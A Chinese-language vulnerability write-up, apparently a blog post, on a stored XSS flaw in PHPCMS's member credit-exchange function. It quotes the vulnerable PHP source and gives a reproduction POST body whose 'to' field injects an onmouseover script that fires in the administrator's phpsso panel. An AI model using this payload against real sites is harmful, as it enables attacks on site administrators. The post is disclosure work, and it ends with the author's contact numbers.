漏洞分析
文件路徑: /phpcms/modules/member/index.php
public function change_credit() { $memberinfo = $this->memberinfo; //加載用戶模塊配置 $member_setting = getcache('member_setting'); $this->_init_phpsso(); $setting = $this->client->ps_getcreditlist(); $outcredit = unserialize($setting); $setting = $this->client->ps_getapplist(); $applist = unserialize($setting); if(isset($_POST['dosubmit'])) { //本系統積分兌換數 $fromvalue = intval($_POST['fromvalue']); //本系統積分類型 $from = $_POST['from']; $toappid_to = explode('_', $_POST['to']); //目標系統appid $toappid = $toappid_to[0]; //目標系統積分類型 $to = $toappid_to[1]; if($from == 1) { if($memberinfo['point'] < $fromvalue) { showmessage(L('need_more_point'), HTTP_REFERER); } } elseif($from == 2) { if($memberinfo['amount'] < $fromvalue) { showmessage(L('need_more_amount'), HTTP_REFERER); } } else { showmessage(L('credit_setting_error'), HTTP_REFERER); } $status = $this->client->ps_changecredit($memberinfo['phpssouid'], $from, $toappid, $to, $fromvalue); if($status == 1) { if($from == 1) { $this->db->update(array('point'=>"-=$fromvalue"), array('userid'=>$memberinfo['userid'])); } elseif($from == 2) { $this->db->update(array('amount'=>"-=$fromvalue"), array('userid'=>$memberinfo['userid'])); } showmessage(L('operation_success'), HTTP_REFERER); } else { showmessage(L('operation_failure'), HTTP_REFERER); } } elseif(isset($_POST['buy'])) { if(!is_numeric($_POST['money']) || $_POST['money'] < 0) { showmessage(L('money_error'), HTTP_REFERER); } else { $money = intval($_POST['money']); } if($memberinfo['amount'] < $money) { showmessage(L('short_of_money'), HTTP_REFERER); } //此處比率讀取用戶配置 $point = $money*$member_setting['rmb_point_rate']; $this->db->update(array('point'=>"+=$point"), array('userid'=>$memberinfo['userid'])); //加入消費記錄,同時扣除金錢 pc_base::load_app_class('spend','pay',0); spend::amount($money, L('buy_point'), $memberinfo['userid'], $memberinfo['username']); showmessage(L('operation_success'), HTTP_REFERER); } else { $credit_list = pc_base::load_config('credit'); include template('member', 'change_credit'); } }
沒有過濾 $toappid_to = explode('_', $_POST['to']);
沒有對用戶提交的數據做過濾導致xss漏洞
漏洞復現:
首先註冊用戶
註冊完畢登陸
打開頁面 http://localhost/index.php?m=member&c=index&a=change_credit&
post數據爲:
dosubmit=1&fromvalue=0.6&from=1&id=1&to=}" onmouseover=alert(1)><img width=0 height=0
管理員打開後臺:phpsso--》 phpsso管理--》通信信息 ,鼠標移到查看,及戶籍觸發指定js代碼
說雞肋也不雞肋,說好用也沒有感覺很好用, 難受
參考地址:https://xz.aliyun.com/t/1860
作者: NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830